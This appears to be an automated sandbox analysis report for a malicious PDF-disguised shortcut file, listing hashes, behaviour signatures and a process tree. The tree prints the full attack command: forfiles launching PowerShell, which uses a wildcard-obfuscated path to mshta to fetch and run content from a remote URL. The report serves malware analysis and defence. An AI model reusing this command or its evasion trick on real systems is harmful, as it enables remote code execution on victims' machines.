Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-10-2024 17:24
Static task
static1
Behavioral task
behavioral1
Sample
A/3rd_cc_form_Oct_2024.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
A/3rd_cc_form_Oct_2024.pdf.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
A/Agreement for YouTube cooperation.pdf.lnk
Resource
win7-20241023-en
Behavioral task
behavioral4
Sample
A/Agreement for YouTube cooperation.pdf.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
A/Instruction_1928.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
A/Instruction_1928.pdf.lnk
Resource
win10v2004-20241007-en
General
-
Target
A/Instruction_1928.pdf.lnk
-
Size
2KB
-
MD5
b874532b90be5bd56eca4b28951f2f76
-
SHA1
0356abd795c63a10cad9383a767687c92fc1b5f8
-
SHA256
92216ebdd28ee3a886e296fd4ef8c5341b8c9dba8f1d1c498db62c95efc97262
-
SHA512
036d26c62b65af38075842642708cf3e3f8eaef05025a7b3449d39e2f15c09a80cfd79ddf411c6d6d1aadd7fca4a462c4f86b5f1375166928457b759822586d3
Malware Config
Signatures
-
Indirect Command Execution 1 TTPs 1 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exeforfiles.exedescription pid Process procid_target PID 2308 wrote to memory of 2804 2308 cmd.exe 32 PID 2308 wrote to memory of 2804 2308 cmd.exe 32 PID 2308 wrote to memory of 2804 2308 cmd.exe 32 PID 2804 wrote to memory of 2772 2804 forfiles.exe 33 PID 2804 wrote to memory of 2772 2804 forfiles.exe 33 PID 2804 wrote to memory of 2772 2804 forfiles.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\A\Instruction_1928.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\ /m Use*s /c "powershell Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto"2⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeStart-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-